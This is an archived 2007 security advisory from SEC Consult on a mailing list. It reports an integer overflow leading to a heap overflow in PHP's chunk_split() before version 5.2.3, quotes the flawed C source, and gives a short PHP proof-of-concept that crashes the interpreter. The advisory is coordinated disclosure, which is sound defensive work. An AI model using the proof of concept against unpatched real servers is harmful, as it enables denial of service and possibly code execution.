lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <46602AE3.4010303@sec-consult.com>
Date: Fri, 1 Jun 2007 16:19:15 +0200
From: Gerhard Wagner <research@...-consult.com>
To: <Bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: SEC Consult SA-20070601-0 :: PHP chunk_split()
	integer overflow

SEC Consult Security Advisory < 20070601-0 >
===========================================================================
                     title: PHP chunk_split() integer overflow
                   program: PHP
        vulnerable version: < 5.2.3
                    impact: moderate
                  homepage: http://www.php.net
                     found: 2007-05-25
                        by: Gerhard Wagner / SEC Consult /
www.sec-consult.com
            permanent link: http://www.sec-consult.com/291.html
===========================================================================


Vendor description:
---------------

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development ...


Vulnerability overview:
---------------

The parameters chunks, srclen and chunklen are used without any check in
a memory allocation statement. Due to a possible integer overflow this
can result in the allocation of a too small buffer which leads to a heap
overflow. This crashes the php process and may allow execution of
arbitrary code.


Vulnerability details:
---------------

In line 1963 the chunk_split function tries to allocate the adequate
size of memory for the result of the function. In case the values chunks
and endlen are bigger than 65534 an integer overflow is triggered and
the wrong size of memory is allocated, which results in a heap overflow.


ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end,
        int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }


proof of concept:
---------------

<?
           $a=str_repeat("A", 65535);
           $b=1;
           $c=str_repeat("A", 65535);
           chunk_split($a,$b,$c);
?>


vulnerable versions:
---------------

The version 5.2.3 fixes this security issue. All earlier releases should
be prone to the demonstrated vulnerability.

vendor status:
---------------
vendor notified: 2007-05-29
vendor response: 2007-05-29
patch available: 2007-06-01
coordinated disclosure: 2007-06-01

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Gerhard Wagner / @2007



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ